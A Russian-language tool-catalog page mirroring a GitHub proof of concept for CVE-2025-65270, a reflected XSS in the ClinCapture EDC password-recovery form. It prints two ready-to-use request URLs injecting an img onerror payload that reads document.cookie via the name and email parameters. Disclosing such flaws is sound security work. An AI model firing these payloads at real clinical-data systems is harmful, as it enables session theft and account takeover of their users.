Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-65270 — Отражённый XSS в ClinCapture EDC | Kitploit
Инструменты/GitHubGitHub/xh4vm/cve-2025-65270
Анализ уязвимостейЭксплуатация веб-приложенийВеб-безопасностьТестирование на ПроникновениеОбучение и Образование
GitHubxh4vm/cve-2025-65270

CVE-2025-65270

Отражённый XSS в ClinCapture EDC

Репозиторий
18 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2025-65270

⚠️ Отказ от ответственности

Этот репозиторий предназначен только для образовательных и оборонительных исследований в области безопасности

🔥 Обзор

Отражённая межсайтовая уязвимость (XSS) в ClinCapture EDC 3.0 и 2.2.3, позволяющая неаутентифицированному удалённому злоумышленнику выполнить код JavaScript в контексте браузера жертвы.

poc_xss

🧪 Доказательство концепции

Чтобы продемонстрировать уязвимость, необходимо перейти на вкладку восстановления пароля и указать полезную нагрузку в параметре name или email, либо отправить один запрос

🔓 Через параметр name

root@kitploit:~
<url>/edc/RequestPassword?action=submit&name=text%22%3E%3Cimg%20src%3dx%20onerror%3dalert(document.cookie)%3E&[email protected]&passwdChallengeQuestion=favorite_animal&passwdChallengeAnswer=&Submit=Submit

poc_xss_1

🔓 Через параметр email

root@kitploit:~
<url>/edc/RequestPassword?action=submit&name=text&[email protected]%22%3E%3Cimg%20src%3dx%20onerror%3dalert(document.cookie)%3E&passwdChallengeQuestion=favorite_animal&passwdChallengeAnswer=&Submit=Submit

poc_xss_2

🚨 Воздействие

Неаутентифицированный пользователь может выполнить код JavaScript в контексте браузера жертвы, направленный на выполнение действий от имени жертвы или кражу конфиденциальной информации, такой как ответ на секретный вопрос

🔗 Ссылки

  • CVE-2025-65270
Скачать инструмент